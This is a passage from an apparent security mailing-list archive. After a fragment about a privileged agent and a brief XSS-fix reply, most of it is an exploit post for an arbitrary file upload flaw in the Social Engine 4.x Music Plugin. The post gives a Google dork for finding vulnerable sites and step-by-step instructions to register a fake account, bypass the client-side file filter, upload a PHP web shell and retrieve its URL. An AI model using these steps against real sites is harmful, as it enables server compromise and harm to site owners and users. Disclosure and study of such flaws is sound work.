non-binary file. It's worth saying that as fval always runs as
privileged user (Administrator/root), all the system files are
accessible and most of them are readable.
 
Windows hosts behave similary. As soon as the Agent is installed, it is
registered as a System Service and runs at boot time. This service runs
the fval binary 

Re: XSS vulnerability in ImpressCMS

2010-12-27 Thread sato-san
fixed with version 1.2.4


Social Engine 4.x (Music Plugin) Arbitrary File Upload Vulnerability

2010-12-27 Thread MyDoom2009
###
# Exploit Title: Social Engine 4.x (Music Plugin) Arbitrary File Upload
# Google Dork: inurl:user/auth/forgot
# Date: 22/12/2010
# Author: MyDoom ( Moroccan Hacker )
# Contact: mydoom2...@gmail.com
# Software Link: http://http://www.socialengine.net
# Version: Social Engine 4.x (should work on previous versions but no tested)
# Tested on: Windows 7 - Linux 3.6.33 2010 - Linux 3.6.18 2010 -
Windows Server 2003
# Greetz to : ALBoraaq Hackers ;) - Especially T3es
###
 
Vulnerable Javascript Source Code:
 
  window.addEvent('domready', function() { // wait for the content
 
   ...snip...
 
 // remove that line to select all files, or edit it, 
add more items
 typeFilter: {
   'Music (*.mp3,*.m4a,*.aac,*.mp4)': '*.mp3; 
*.m4a; *.aac; *.mp4'
   },
 
Description:
 
The File filter used in the code don't check the uploaded file but
only set the type of files that can be veiwed in the upload window
so if we type  *.*in the filename we will see all others file and
then we can upload any type of file.
 
Exploit:
 
[~] Step 1 : Find A social network using the Social Engine with MUSIC PLUGIN
 
[~] Step 2: Register A Fake Account
 
[~] Step 3: Click On Music Link in the menu or go to http://www..com/music
 
[~] Step 4: Click On Upload Music And Then Fill the Playlist info
 
[~] Step 5: Click On Add Music And Select The php file ( If you can
see php file in the upload window type *.* in the file name )
 
[~] Step 6: And Click on save music to playlist
 
[~] Step 7: You Will See the Music Player Move the Cursor on the php
filename and copy the link of the shell.
 
Generaly it will be :
http://www.xxx.com/public/music_song/100/[numbers]/[user_id]/[some_numbers].php